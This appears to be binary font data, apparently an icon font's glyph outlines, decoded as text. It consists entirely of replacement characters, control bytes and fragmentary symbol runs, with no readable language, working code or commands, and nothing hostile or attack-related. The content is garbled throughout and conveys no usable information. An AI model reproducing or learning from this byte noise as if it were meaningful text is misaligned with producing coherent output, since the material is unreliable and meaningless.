,J~S/#NL,��8JsF);??1zIEJpq�DIPZXSF6[?5:NR=��;.&1��+!"&=!!%!5463!2�sQ9����Qs�*�*�*sQNQsBUw��
wUBF��H���CCTww���%1#"&=!"&=463!54632.  6 $$ �	��	
��

`?��������(�r���^����a�a�	��	
�
�
�
���(��������_�^����a�a�����%1#!#"'&47632!2.  6 $$ �
����		@	
`
��������(�r���^����a�a�
�
?		@	
���(��������_�^����a�a�����/#"'&476324&#!"3!26#!"&5463!2&�@�&
�@

�
�w�@w��w�w����&@B@&���

�@
�@w��w�w�����"&462  >& $$ �Ԗ��*�����(���r���^����a�a�Ԗ�Ԗ �������(���^����a�a���]�6#"$54732>%#"'!"&'&7>32'!!!2�f:�л����Ѫz��~�u:�
(�(%`V6B^hD%��i�(�]̳ޛ	��*>�6߅�����r�#�!3?^BEa�߀�#�9���#36'&632#"'&'&63232#!"&5463!2
��Q,&U�#+'
 �;il4L92<D`����w�@w��w�w�����`9ܩ6ɽ]`C4�7�7�&�@w��w�w����D+"&5#"'&=4?5#"'&=4?546;2%6%66546;2�������
	
��
	
��w�ww�w�������cB
�G]B
�G��t�y]t�y�
���#3C#!+"&5!"&=463!46;2!24&#!"3!26#!"&5463!2���@��`@`�^B��B^^B@B^��w��w��w@w��@��`@`���2@B^^B��B^^���w��w@w�����'/?P+5#"&547.467&546;532!764'!"+32#323!&ln��@
:MM:
@��nY*�Yz--zY�*55QDD�U���9p��Y-`]��]`.X /2I$�	t�@@/!!/@@3,$,3�$p$0�0��&*0��&���&��
!P@���RV2#"&/#"&/#"&546?#"&546?'&54632%'&54632763276%�>S]�8T;/M7��7T</L7�=Q7,�i�<R7,�5T</L666U;/M5�<U<,�i���6i���Q=a!;�;V6-�j�;V6-�5	P=/L596Q</L5�<U6-�i�;V7,�7O;-I6��8��i;k���)I2#!"&5463#9"'.'.'3!264&#!"2>7%>�w��w�@w��w�!"�5bBBb.�/*
8(@(87)��(8=%/�'#?��w�@w��w�w����#~$EE y &�L(88e):8(%O r		

		�O�?GQaq47&67>&&'&67>&"&#6$32#"#"'654  $&6 $6&$ Co��L��.*�KPx���.*� 
iSƓi
7J?��~�pi{_Я�;��lL�������UZ=刈�����刈�����_t'<Z
�:!
	���@!
��j`Q7$k�y, R����f��k*4�������LlL��=Z=刈��������&$&546$7%7&'5>�����]���5��%��w�����������&��P�?�zrSF�!|��&0	##!"&5#5!3!3!3!32!546;2!5463���)�
)����;)��);;)��)���&&������&@@&�&��&��	�
6 $&727"'%+"'&7&54767%&4762������֬>4P���t+8?::
	�	
::AW��``���EvEEvE<�.���"�e$IE&�O�&EI&�{h.`��m���"&#"&'327>73271[
>+)@
(���]:2+D?��*%�Zx/658:@#N
�C�=�E�(�o��E=��W'c:������#!#"$&6$3 &#"32>7!����ڝ���yy��,��{��ۀ�ہW�^F!�L�C=���y�:�y��w���߂0H\R%�"N^ '&76232762$"&5462"&46274&"&'264&#"'&&#"32$54'>$ $&6$ G>��>0yx1��4J55J�5J44J5�Fd$��?�4J55%6�E��#42F%��$f�������LlL�q>>11�J44%&4Z%44J54R1F$Z-%45J521��Z%F1#:��ʎ 9�������LlL�����#Qa"'&7622762%"&5462"&546274&#"&'73264&#"'&&#"32654'>#!"&5463!2�

5�5

*�*��.>.-@-R.>.-@-�<+*q�6�- -- 0�<�o,+< ��3�w�@w��w�w��

55

**�.. -- .. --G*<N�' ,-@-+*��M <*2
z��z
1�@w��w�w�����0<754&""&=#326546325##"&='26 $$ bZt�t&�sRQs��Z<t�sQ���^����a�a�>OpoO��xzRrqP6�z~{{Prr��^����a�a�����]054&"#"&5!2654632!#"&57265&<T<����H<T<������H������<T<8v*<<*������
��+;;+l���:�������=:��*;;*���
%!!"!!26#!"&5463!2��@� ]���]�@�w�@w��w�w�����]� �@��@w��w�w���	
%)3!!#335!!5!5!%#!!5!5!%#H��H{����R��H��H{���G��G{�)���q���G����R�R�q���R�R�q�����	#0@#"'632#"'632&#"7532&#"#7532#!"&5463!2L5+*5��L5+*5~�}7W|�3B}��}JC��7=}�w�@w��w�w�D�ZQ�[�1�N:_��)�i�$��)���@w��w�w��
)�	�����������6.#&#"'&547>'&#".'&'#"&5467%&4>7>3263232654.547'654'63277.'.*#">7?67>?>32#"'7'>3'>3235?�K�cgA+![<E0y�$,<'.cI
	,#� '!;7$�=ep���	��/�/7/
D+R>,7*
2(-#=
	/~[(D?G  �|,)"#+)O��8,+�'�6	y{=@��0mI�#938OA�E`
-�
)y_/FwaH8j7=7?%����a	%%!?)L
J
9=5]~�pj

 %(��1$",I 
$@((�
+!.S		-L__$'-9L	5V��+	
	6�T+6.8-$�0��+
t�|S1��6]�&#"'&#"67>76'&'&#"67>32764.#"#.32>67>7 $&54>7>7>7�rJ�@"kb2)W+,5/1		#

Z
-!��$IOXp7s�LCF9�vz NAG#/ 5|����Հ';RKR/J#=$,�9,�+$UCS7'2"1
 !�/
,

/--ST(::(�ep4AM@=I>".)x��ls��Y�|qK@
%(YQ�&N
EHv~����<Zx'#"&5467&6?2?'&"/.7.546326#"&'&/7264/7'764&"'?>>32.��A�UpIUxYE.A�%%%h%����%hJ%�����D,FZxULsT�gxUJrV�D�%hJ%�����@/LefL.C�%Jh%�����C�VsNUxϠ�@.FZyUHpV�A�%h&%%���%Ji%�����C�WpIUybJ/��Uy^G,D�%Jh%�����@�UsMtU�C�%hJ%�����C-Kfy�EX[_gj��&/&'.''67>7>7&'&'&'>76763>7>#&'&'767672'%'7'+"&'&546323267>7%#"'4'6767672,32�,+DCCQL�Df'
%:/d
B	4@}
�&!0$�?�����J�f�d�f-�.=���6(��:!TO�?
!I�G_�U%
����.
j+.=;�	5gN_X��	"
##
292Q41�
��*����6���nA;�|�
�BSN.	%1$����
6	#��nk�^�'7GWgw�����2+"&5463#!"&5463!254&+";2654&+";2654&+";2654&+";2654&+";2654&+";2654&+";2654&+";2654&+";26#"&=! B^^B�B^^B�:F�j��B^8(�(`�(� ������������������`�(8���^B��B^^B@B^�"vE�j�^B(8(�`(�����������������������8(����/?O_o��������/?2#!"&5463;26=4&+";26=4&+";26=4&+";26=4&+"54&+";2654&+";2654&+";2654&+";2654&+";2654&#!"3!2654&+";2654&+";2654&+";2654&+";2654&+";2654&+";2654&+";2654&+";2654&+";26@&&�&&�@@@@@@@@�@@@@@@@@@@��@@@@@@@@@@@@@@@@@@@&��&&�&��@@��@@��@@��@@��@@@@@@@@@@���@@@@@@@@�@@@@@@@@@@@��`%	"&5#"&5&462!762$"&462���B\B@B\B��8P�p�P8����������.BB.���.BB.8$P8��8P広�������3CQ#".54>32#".546322#"&#"#"54>%".54>32%2#"&54>&X=L|<&X=M{<��TML�FTML�F�v�"?B+D�?B�J�p��H=X&<{M=X&<|dMTF�LMTF�(<kNs�I<kNs���Pvo�JPwo�/��s.=ZY�VӮv�Nk<J�sNk<I�shwPJ�ovPJ�o@��+"&7.54>2�r_-$�$-_rU���U��%��&&5%ő������'-
"'.546762����@��F�F�$�@B�@$.&�,�&.]]|�q����#<���<#(B�B��B%'-%'-'%'-"'%&'"'%.5467%467%62����@��l�l����@��l�l,���@��G�G�&!�@@�@�@@�@!&+#�+#�6�#+�$*`�:�p������:�p���x�
�p����=�`$>����>$�&@��&@�

�@&�p�@��	&.A!!"!&2673!"5432!%!254#!5!2654#!%!2#!8���Zp��?v�d���Ί�e�ns�6(���N[�����RW�u?�rt1Sr�F���|��iZ��@7�����މoy2���IM��C~[�R �yK{T:���%,AGK2#!"&5463!!2654'654.#532#532"&5!654&#"327#2#>!!�w��w�@w��w��~u��k'JTM��wa��|
DH��������>�I1q�Fj?����w�@w��w�w�����sq�*4p9O*�¸Z^���qh LE
�������"(nz8B
M���'?"&4624&#"'.'324&#"3267##"&/632632.�ʏ����hhMA�LR vGhг~��~������K„y���O^
��ʏ�ʏ��В*�LM@!<I�~��~����������t\��0�������CM4&"2#"&'676&/632#!"&=3267%2654&#"&#"%463!2"&4632�r�qq��tR8^4.<x3=RR��w�@w���_h�
Y��Ӗ���	K>�שw�w���ȍ�de�)�qrOPq�Ȧs:03=<x!m�@w��w�E\x�g�ӕ��є��%w�w����d��Ȏ��V��
-<K\%.'.>7'.?67'67%'>&%'7%7./6D�\$>	"N,��?a0�#O���1G�����9�'/���P(1#00��
($=!F"�9|��]�"RE<�6'o��9%8J$\:��\H�iTe<?}V��#�oj��?���d,6���%N#"
Hl��S��VY�]C

=�@�C4&"2!.#!"4&"2+"&=!"&=#"&546;>3!232�^�^^���Y	�	^�^^��`p�p�p�p`�]i�bb�i]�~�^^�^�e��^^�^���PppP��PppP��]��^^�]��3;EM2+"&=!"&=#"&546;>;5463!232264&"!.#!"264&" ]�`p�p�p�p`�]i�b���b�i���^^�^d�Y	�	!�^^�^��]��@PppP@@PppP@�]��^��^�]� ^�^^��e��^�^^� ��3$#!#!"&5467!"&47#"&47#"&4762++�&�2
$��$
�2&��&��&�4�&��&��Z4&�&##&�&4�&4�&4���4&�m4&�m���+DP4'&#"32763232674'&!"32763 3264'&$#"32763232> $$ g����* �o�`#�ə�0#z��#l(~���̠)���-g+����^����a�aF s"	+g�(�*
3#!|
#/IK/%*%D=)[�^����a�a����	!!!'!!77!���,���/���,�-���a��/G��	t%/;<HTbcq������%7.#"32%74'&"32765"/7627#"5'7432#"/7632#"5'7432#"&5'74632	#"/6327#"/6327#"/46321"&/462"&/>21"&/567632#!.547632632
	
	*


			��X		�

^

`		���

^b
	��c�
	f�u��
U`�59u���

���

4�J���
	
l�~		~�	F��	
��	�2�����

�
�	��	�m����|O�,��� ����	

���
��������

ru|	��u�
�
"�����
)9 $7 $&= $7 $&= $7 $&=  $&=46��w���`���w���w���`���w���w���`���w��b����`����VT�EvEEvE�T��VT�EvEEvE�T*VT�EvEEvE�T*EvE�EvEEvE�Ev�#^cu��#!"&5463!2!&'&!"&5!632#"&'#"/&'&7>766767.76;267674767&54&5&'67.'&'&#3274�(8(��(88(�(`�x
��c�`(8��!3;:�A0�?ݫ�Y

	^U	47D$

	7�4U3I�
|��L38wtL0�`(��(88(@(8(D��9�8(��Q1&(!;��
(g-	Up�~R�2(/{E���(Xz*Z%(�i6CmVo8�#Q#!"&5463!2!&'&!"&5!3367653335!3#'.'##'&'35�(8(��(88(�(`�x
��c�`(8�iF������F��Zc�r�cZ�`(��(88(@(8(D��9�8(���k�k�"	��kk�J 	!��	�k�#S#!"&5463!2!&'&!"&5!%!5#7>;#!5#35!3#&'&/35!3�(8(��(88(�(`�x
��c�`(8�-Kg
kL#D��C��JgjL��D���`(��(88(@(8(D��9�8(���jj�	�jjkk��kk����#8C#!"&5463!2!&'&!"&5!%!5#5327>54&'&#!3#32�(8(��(88(�(`�x
��c�`(8� G]�L*COJ?0R��\wx48>�`(��(88(@(8(D��9�8(���jj��RQxk��!RY�#*2#!"&5463!2!&'&!"&5!!57"&462�(8(��(88(�(`�x
��c�`(8�������P�pp�p�`(��(88(@(8(D��9�8(����������p�pp�	�#*7JR5#5#5#5##!"&5463!2!&'&!"&5##5!"&54765332264&"�����<(8(��(88(�(`�x
��c�`(8����k�ޑc�O"�jKKjK�������������`(��(88(@(8(D��9�8(������SmmS?M���&4&&4�#9L^#!"&5463!2!&'&!"&5!#"/#"&=46;76276'.'2764'.�(8(��(88(�(`�x
��c�`(8���������6dd�WW6&44�`(��(88(@(8(D��9�8(��.��	����G���5{��{5�]�]$59�95�#3C#!"&5463!2!&'&!"&5!2#!"&5463#"'5632�(8(��(88(�(`�x
��c�`(8��4LL4��4LL4l	��		�`(��(88(@(8(D��9�8(���L4��4LL4�4L��	
Z
	�#7K[#!"&5463!2!&'&!"&5!>&'&7!/.?'&6?6.7>'�(8(��(88(�(`�x
��c�`(8�`3��3��3��3�v
�
?
�
�`(��(88(@(8(D��9�8(���&��&-��&��&�
?


��
'���6#'.
'!67&54632".'654&#"32�eaAɢ/PRAids`WXyzO�v��д��:C;A:25@Ң>�����-05r��n������`��H(�����' gQWZc[���
-%7'	%'-'%	%"'&54762�[������3[��M���N�����
��3"��,��""3,3"o�ng�$������߆���]�g�n��$����+��)��

")")"

��x#Z#"&#!+.5467&546326$32327.'#"&5463232654&#"632#".#"o���G��n\�u_MK'����̨|�g?CM7MM5,QAAIQqAy��{�b&
BL4PJ9+OABIRo?z��.�z��
�n�6'+s�:�������z�cIAC65D*DRRD*�wy�a$,@B39E*DRRD*��'/7  $&6$ 6277&47' 7'"' 6& 6'�lL������������R�R����ZB|��R�R��>����d�ZZ��������LlL�Z����R�R«����Z��&�>���«|��R� � ��! $&54$7 >54'5��������P���f���f����P�����牉�@��s��-����ff���`-����c6721>?>././76&/7>?>?>./&31#"$&��(@8!IH2hM>'

)-*
h'N'��!'Og,R"/!YQG<I *1)

(-O1D+0�n�������z�3fw���G2'3�rd1!sF0o ��.q"!%GsH8��@-!5|w|pgS=
"B2PJfh�G���d�R	�(P]ly��&$'77&7567'676'"'7&'&'7&47'6767'627''6$'67'654'7&'7'&'&'7&'5&$  $6 $&6$ j��j:,A��A��S9bb9R#:j���8AܔA,z��C�9Z04\40Z9�C��!B�;X0,l,0X;�B�*A8ܔA&#9j`b9S$#R99#&A��8A�`
������䇇�<Z<䳎������LlL�fBϬ"129�,V<4!���!88dpm��"��BV,�92[P*V*P\M�C�

�C�M\P*V*P]L�D�

�D�L&BV*�8*8!����f�!4<gmpd88!&!8*8�*VB�Z<䇇�����䇇��������LlL�����9Eis�%#"5432#"543275#&#"3254&'.547>54'63&547#5#"=3235#47##6323#324&"26%#!"&5463!2F]kbf$JMM$&�N92<Vv;,&)q(DL+�`N11MZ
%G���&54	#	i�<$8&@��0H12F1d�w�@w��w�w��B?@�UTZ3%}rV2hD5%f-C#�C@,nO	�a7�.0�x2	yR�uR/u�%6;&�$76%$56S�@w��w�w��D��<Hlw%4#"324&#"32!".5475&5475.546322#654'3%#".535"&#"5354'33"&+32#"&54632S����;<;||w
$+�|('-GVVG-��EznA�C?H_��`Rb���]Gg>Z2&`��9UW=��N9:PO;:dhe\=R����
+)�&')-S9��9kJ�<)Um�Q��/��-Ya^"![��Y��'(<`X;_�L6#)|����tWW:;X���	#'#3#!"&5463!2)
p�*�xeשw�@w��w�w���0,\8�����@w��w�w��9��I#"'#"&'&>767&5462#"'.7>32>4."&'&54>32JrO<3>5�-&FD(=Gq���@C$39a��LL��²�L4

&)
@]��v�
�q#CO���!~󿵂<ZK#*Pq.���%
L��²�LL��arh({�w؜\���i&5467&6747632#".'&##".'&'.'#".5467>72765'./"#"&'&5
�}����1R<2"7MW'$	;IS7@�5sQ@@)�R#DvTA;
0x
I)�!:>�+<B76:NFcP:SC4r�l+r �E%.*a-(6%('�>)C	6.�>�
!-I[4&#"324&#"3264&#"324&#"326&#"#".'7$4$32'#"$&6$32D2)+BB+)3(--(3�1)+BB+)�4'--'4��'���#!0>R	�H���MŰ9�o�u7ǖD��䣣���
R23('3�_,--,�R23('3�_,--,�����NJ
������?u�W�m%������#"'%#"'.5	%&'&7632�!�
�;�
	`��u%"��(����!]#�c�)(�	��� #"'%#"'.5%&'&76	�!�
���	�(%#�#���fP_�"�(���!�)'��+�ʼn�����4I#"$'&6?6332>4.#"#!"&54766$32#!"&=46;46;2z�䜬��m�
I�wh��QQ��hb�F�*�@&('�k�������@����z��
�	
_hQ��н�QGB�'(&�*�eozΘ�@@`���  >. $$ ����ff���ff�����^����a�af���ff�����^����a�a��>�����"&#"#"&54>7654'&#!"#"&#"#"&54>765'46.'."&54632326323!27654'.5463232632�,�-,�,",:!
%�]&
%@2(/�.+�*)6!	<.$.�.*�*"+8#
�
#Q3,�,+�+#-:#"</$�)

w�

���
,*

x9-.2"'
,,
���@�&,,
��Qw
,����,#"+"&5#+"&5&'&'&547676)2�%2$l$�#l#�b~B@XXyo2�$CI@5��$$�>$$�/:yu��xv)%$	��/?CG%!5%2#!"&5463!5#5!52#!"&54632#!"&5463#5!5`���&&�&&������ �&&�&&�&&�&&@������&�&&&���������&�&&&�&�&&&��������%2 &547%#"&632%&546 #"'6���������\~����~\h�
���~\��h\�������V�
�V�������V��V���%5$4&#"'64'73264&"&#"3272#!"&5463!2}XT=��=TX}}�~�>SX}}XS>�~�}�w�@w��w�w���~:xx:~�}}Xx9}�}9xX}�@w��w�w���/>LXds.327>76 $&6$32762#"/&4762"/&47626+"&46;2'"&=462#"'&4?62E0l�,

*"�T�.�D@Yo������oo����@5D�

[		

Z
�Z

		[	 ``��[



Z

	�2
,�l0
(T�"�.�D5@������oo��oY@D,

Z

		[	�		[		

Z
��``EZ

		[		
�5%!  $&66='&'%77'727'%am��lL�������m�f�?���5���5>�f�F�tu�ut�F������������LlL�H�Y�C�L|��|L����Y�˄(��E''E*(�/?IYiy����%+"&=46;2+"&=46;2+"&=46;2+"&=46;2%"&=!#+"&=46;2+"&=46;2+"&=46;2+"&=46;2!54!54>$ +"&=46;2#!"&=������@�������&&������@��������������3P��
>��P3��&��&��r���r��r���&��&���r���r��r���
he

4LKM:%%:MKL4�W��T�&&��%/9##!"&563!!#!"&5"&5!2!5463!2!5463!2�&&�&��&�&&���� ��� ��&��&&i�@����&&@&7�����'#5&?626�J%�o����;����j|/����&jJ%�p��&`Jj&�p���/|���j�ţ���%Jk%�o��%��	:g"&5462#"&546324&#!"263662>7'&75.''&'&&'&6463!276i���~ZYYZ~�@O��S;+[G[3YUD#o?D&G3I=J�y�TkBuhNV!WOhuAiS�y*'^C�C^'*SwwSTvvTSwwSTvv���WID\�_"[�g��q# /3qF��r2/ $r�g�%4
�HffH�J4d���#!#7!!7!#5!������VF��N����rmN�N��N����������N���!Y���+?Ne%&'&'&7>727>'#&'&'&>2'&'&676'&76$7&'&767>76'6�#
<�;1�1x��#*#
�F-T9�3%�/#0v�N�Z;:8��)M:(	&���C.J}2	%0����
 	^*
J�F	
&�7'X"2L�DM"	+��6�
M2+'BQfXV#+]
#���'
L/(e�B�9
�#,8!!!5!!5!5!5!5#26%!!26#!"&5!5���������������&4&���&�pP��Pp������������������@��@&&@��!&�@PppP@�*
��	9Q$"&54627"."#"&547>2"'.#"#"&5476$ "'&$ #"&5476$ (�}R}hL�K�
N���N
����U�d:�
�x�x�
�����8���
��
�
� ,, |2222�
MXXM

�ic,>>,�
����
�	����	�
��̺

�
��'/7?KSck{4&"2$4&"24&"24&"24&"24&"24&"24&"24&"264&"24&#!"3!264&"2#!"&5463!2�KjKKj�KjKKj��KjKKjKKjKKj��KjKKj��KjKKjKKjKKj��KjKKjKLhLLhL��KjKKj�&�&&&KjKKj�L4��4LL4�4L5jKKjKKjKKjK�jKKjK��jKKjK�jKKjK�jKKjK��jKKjK�jKKjK���4LL4��4LL�jKKjK�&&�&&��jKKjK�4LL44LL	��'E!#"+"&7>76;7676767>'#'"#!"&7>3!2�W�",&7'�	#$	&��g�pf5O�.P�q�ZZdS���-V"0kqzTx�D!��!8�p�8%'i_�F?;�k��R(`��
!�&)�w���.<\.'.>%#"'.7>.'&67632&'6'&'
#"'.766.'&67632Z
&+\cc:>'D�>��6KD3W6,9(<*0-?")/SW7.Crb	�	:+OIX3'#C3:@#*"-A%,1U�=}��AQ�fO$"�|'"S�*�����`H(�:Uܳ�J?�2�7���s����Zy%+��A�����07�C~�Ӗ5A�"3��	�>IY#6?>7&#!%'.'33#&#"#"/3674'.54636%#"3733#!"&5463!2��4��:@��7�vH��%�h��EP{��0&<'VFJo���1,1.F6��A��#���L4�4LL44L"%�	
 
7x'6
O\�JYFw���~�v^fH$ !�"xdjD"!�6��`J�4LL44LL��	�$1Ol�������-#"326%356.#"#"326%4#"326%3#7#'#3%#7#"&546324>54#"47632&#"'"'473254&'&54323#327#"'47673#327#"546327&#7673>7&#"327#"&54632#7#"&54632654#"47632&#7673>73#7#"&54632.#"#&'#67&#"327&'3673326#!"&5463!2�
/�>	0@�[W,8 G'"5,Q4/&4/	$&J�	(W" 	+Tl	+7�o	_7*#)�
	83�	(
-5G8�
.'3/$&I�8
4�8+5%7%{�����,2,rr,2,����������x-2.jj.2-x�����L4�4LL44L[ <	J 2)(*(��������8$e '+
,1)H/	'H4///,~i6_7G*''4f�E!%97+"
;=4FYqO" '+
,&2hh_,��0(5N�(��nt��gg��tn�����no��__��on��4LL44LL��	�
BWbjq}��+532%+5324&+32763#4&'.546327&#"#"'3265#"&546325&#"32!264&"2%#'#735#535#535#3'654&+353#!"&5463!29$<=$�@?�SdO__J-<AA@)7")9,<$.%0*,G3@%)1??.+&((JgfJ*�A�������!&��j�jj��GZYG�иwssw��PiL>8aA	!M7�7MM7�7M�3!�
4erJ]��&3YM�(,
,%7(#)
,(@=)M%A20C&Me�e��(X���0&Ėjj�jV��	8Z8J9���N/4���$�8NN8�8NN��	�#&:O[���	$?b3'7'#3#%54+32%4+324+323'%#5#'#'##337"&##'!!732%#3#3##!"&53733537!572!56373353#'#'#"5#&#!'#'#463!2#"5#"5!&+&+'!!7353273532!2732%#54&+#32#46.+#2#3#3##+53254&".546;#"67+53254&.546;#"#'#'##"54;"&;7335wY-AJF���=c�(TS)!*RQ+��*RQ+�Y,�B^9^��Ft`njUM�')	~PS�PR�m���٘���M7�7Mo7�q

@)U	8�"����E(�1��++��NM7�7Mx3�7��8�D�62��W74�;�9�<�-A"EA�0:��AF@�1:�ؗ����B�f~~""12"4(�w$#11#�@}}!%+%5(�v$:O�\z��K��?*$\amcrVl��OO176Nn�<!E(=�<&l/������<<������
[ZZYY�89176���7OO7�==..//cV==::z,,,,aa,,��7OO7�Z::��;;Y
fcW�(		"6-!c�(		!5	#
b�t88176����tV:
&$'*9	%e#:
%'*9B����<<��;
&(�����	�#:Sn�����#"&54632%#76;2#"&54632%4&+";2?>23266&+"&#"3267;24&+"'&+";27%4&+";2?>23266&+"&#"3267;254+";27#76;2#!"&5463!2�3%#2%%,, _3$$2%%��M>�ALVb5)LDHeE:<
E�Mj,K'-R
M�~M>�ARVb5)LEHeE:<
E�
JAB�I*'!($rL4�4LL44Lv%1 %3!x*k�$2 %3!�;5�h
n
a�
!(lI;F	
	
��	r�p
p8;5�h

t
a�
!(lI;F��`	#k�4LL44LL
��	�
2HW[lt��#"'5632#6324&'.54327&#"#"&'32767#533275#"=5&#"'#36323#4'&#"'#7532764&"24'&#"327'#"'&'36#!"&5463!2=!9�n23��BD$ &:BCRM.0AC'0RH`Q03'`�.>,&I / *�
 /

��8/��n-(G@5��$ S3=�,.B..B�02^`o?7je;9G+��L4�4LL44LyE%#	�Vb�;A
!p &'F:Aq)%)#o�rg�T$v2�� 8�)2����z948/�{�8A�B..B/��q?@�r�<7(g/��4LL44LL��?#!"&'24#"&54"&/&6?&5>547&54626=�L4�@�ԕ;U g3
��
T
�2RX='�8P8|�5�
����4Lj��j� U;Ig@
	��
`
� "*\���(88(�]k
��&N4#"&54"3	.#"#!"&'7!&7&/&6?&5>547&54626;U gI��m*��]�Z0�L4�@�ԕ���=o=CT
��
T
�2RX='�8P8|�5�
� U;Ig��Xu?bl3���@4Lj��j��a���`
	��
`
� "*\���(88(�]k����/7[%4&+";26%4&+";26%4&+";26!'&'!+#!"&5#"&=463!7>3!2!2@@@@@@���0
��
o`^B��B^`5FN(@(NF5���@��@��@�u		�@�LSyuS�@�%44%����,<H#"5432+"=4&#"326=46;2  >. $$ ~Isy9���"SgR8v�H����D�	w
����ff���ff�����^����a�a�m2N+��	)H-mF+1����0*F		+f���ff�����^����a�a�����b4&#"32>"#"'&'#"&54632?>;23>5!"3276#"$&6$3 �k^?zb=ka`�U4J{�K_/4�^����W�&	vx :XB0���܂�ff���)
f������zz��X��lz=l�apz��o�b35!2BX���
�G@8��'	'=vN$\f���f�	1
	SZz�8�z�X�#("/+'547'&4?6276	'D�^�h

�

i��%5�@�%[i

�

h�]��@������]�h

�

i��%�@�5%[i

�

h�^�@@������)2#"&5476#".5327>OFi-���ay~�\~;��'�S���{�s:D8>)AJfh]F?X��{[��TC6��LlG��]��v2'"%B];$�+l|��%!2>7>232>7>322>7>32"&'.#"#"&'.#"#"&'.#"#546;!!!!!32#"&54>52#"&54>52#"&54>52�-P&+F) $P.-P$'#+&PZP&+#"+&P-#) $P-.P$(#+$P.-P$'#+&P-.P$+#pP@@Pp�H85K"&ZH85K"&ZH85K"&Z����@��Pp��@��@��@pMSK5, :&�LMSK5, :&�LMSK5, :&����!!3	!	�����@�����@@�����	#"$$3!!2"j������aѻxl���a����lx�a�a����j������!!3/"/'62'&63!2��'y��

�`�I

��y�����My��

�`�I

��y'W`#".'.#"32767!"&54>3232654.'&546#&'5&#"

4$%Eӕ;iNL291 ;XxR`�f՝�Q8T������W��iW�gW:;*:`�Qs&?RWXJ8�oNU0�J1F@#)
[�%6_PO�QiX(o�`��_?5�"$���iʗ\&>bd�s�6�aP*< -;iFn�*-c1B���Wg4'.'4.54632#7&'.#"#"'.#"32767'#"&54632326#!"&5463!2��#$(	1$6]'
!E3P|ad(2S;aF9'EO�Se�j]�m�]<*rYs��hpt.#)$78L*k�h�w�@w��w�w��B

%
$/$G6
sP`X):F�/�fwH1p�dl�qnmPH�ui�kw_:[9D'��@w��w�w��34."2>$4.#!!2>#!".>3!2�Q��н�QQ��н�QQ��h�~w��w�h���f����ff����н�QQ��н�QQ��н�QZ����ZQ�����ff���ff�#>3!2#!".2>4."f����ff�����н�QQ��н�QQ���ff���ff��Q��н�QQ��н�	,\!"&?&#"326'3&'!&#"#"'  5467'+#"327#"&463!!'#"&463!2632���(#�AH����s���9q � ci��<=�
#�]�<������OFA��!�������re��&&��U�&&![e��F �������U?���g�����4_���������a�?b�+��r7�&4&��&4&�p,�+K4&"2$4&"2.#!"3!264&#!"3!2#"&=!"&=#47>$ �KjKKjKKjKKjH#�j#H&&&������KjK�KjK�g	�V�	ijKKjKKjKKjK���..n((�[���5KK5��5KK5�[po�Nv<<vN�:f���.R#!"&463!24'!"&5463!&$#"!2#!32>+#"'#"&546;&546$3232�2$�B$22$�$�*$22$�X�ڭ��ӯ�$22$�tX'���hs2$���ϧ��kc�$22$���1���c�$2�F33F3VVT2#$2����ԱVT2#$2��g���#2UU���݃
�2$#2UU�1݃���2��,u�54#"67.632&#"32654'.#"32764.'&$#"7232&'##"&54732654&#"467&5463254632>32#"'&�ru�&9��%"*#�͟<yK0Og�" 
&9B3�;��㛘8��s%+DWXRD= @Y%�	!Q6R�!4M8�+6rU^z=)�RN��.)C>O%GR�=O&^���op������C8�pP*�b�Y
_�#��$��N Pb@6��)?����+0L15"4$.�Es
�5I�Q"!@h"�Y7e|J>z�iPe��n�eHbIl�F>^]@����n*9
���6[_3#"&54632#.#"32%3#"&54632#.#"326%4&'.'&! ! 7>7>!���������
�=39?
6'_����������
�>29?
5'17m-V����U--,�bW.�������뮠@Fyu0HC$������뮠@Fyu0HC$L���=??
<����=! A	<��`�;+"&54&#!+"&5463!2#!"&546;2!26546;2���p���Ї����0�p�����p���@��I�������pp���>Sc+"&=46;254&+"&+";2=46;2;2=46;2;2%54&#!";2=;26#!"&5463!2���A5�DD�5A7^6a7MB5��5B7?�5B~�`��`��`0`��rr��5A44A5�����v�5AA5�f�*A���`��`0`�����	!!!!	#!"&5463!2��ړ�7���H��7j�v�@v��v�v��'���:��@v��v�v���MUdkpu{����������������#"'!"'!#"&547.547.54674&547&54632!62!632!#!6227'!%!"67'#77!63!!7357/7'%#	%'3/&=&'	5#?&5476��!�p4�q"���"�"�6�"� ��'������h*�[���
��|�*��,�@���?wA�UM�pV���@�˝�����)��Ϳw����7(�{��*U%���K6������=0�(���M���		��"!O		dX$k
!!��!
����b��	
���[�����TDOi
��@��6��b��xBA�ݽ�5
�
�ɝ:����J���+���3����,��p
x�1���������Fi
(��R��
463!#!"&5%'4&#!"3���`����а@.�.@A-X��f�B����$��.BB.�.C��}
)&54$32&'%&&'67���"w�`�Rd]G�{��o]>p6��sc(��@wg����mJ�PAjy���YW�a͊AZq���{HZ�:�<dv\gx�>��2AT�Kn������+;"'&#"&#"+6!263 2&#"&#">3267&#">326e��~�└�Ȁ|��隚���Ν|����ū|iy�Zʬ��7Ӕ�ް�r|�uѥ��x�9[��[9�jj��9A�N��N�+,#ll"���B�S32fk��[/?\%4&+";26%4&+";26%4&+";26%4&+";26%#!"&5467&546326$32�]]��ee��ee��ee��$��~i
�qfN-*���������#����Sj������t�2"'q�C���B8!�'�>	
!%)-159=AEIMQUY]agkosw{��������!	%!	5!#5#5#5#5#57777????#5!#5!#5!#5!#5!#5!#5!#5#537#5!#5!#5!#5!#5!#55#535353535353%"&546326#"'#32>54.&54>3237.#"����������Q%%%%%%%%%?iiihOiixiiyiixii�Arssrrssr��%s�ssrrss�Ns%%%%%%%%%%�����������'<D<'paC_78#7PO7)("I$	75!����RA��b��(���ss�ss�ss�ss�ss�"/!".""."
!."".!/^.".^.".]/".�$$$$$$$$$$$$$$$$��Os$$$$$$$$$$$$$$sO$s�ss�ss�ss�ss�ss#��������}$)	13?*
,./:
-�s�*4&"2$4&"2#!"&5463!2!5463!2_��������?-��-??-�,@�@,�-?����pq�8��,??,D,??,��,??(�Z2#".#"3267>32#".543232654&#"#"&54654&#"#"&547>326���ڞU�zrhgrx�S��Пd�U <e�����x՞����Zf��_gן:k=2;�^��9��Œ��7\x��x\7����K=5Xltֆ�W����W{e_�%N��%,%CI��%���#+W4&+54&"#";26=32"&462"&462!2#!"&54>7#"&463!2!2�&�&4&�&&�&4&���KjKKj�KjKKj� ���&&�&%��&&�&&4&�&&�&4&�&&��5jKKjKKjKKjK��%z
0&4&&3D7&4&
%&���'S4&"4&"'&"27"&462"&462!2#!"&54>7#"&463!2!2&4�&4&�4&4��KjKKj�KjKKj� ���&&�&%��&&�&&4&�%&&�ے&4��"jKKjKKjKKjK��%z
0&4&&3D7&4&
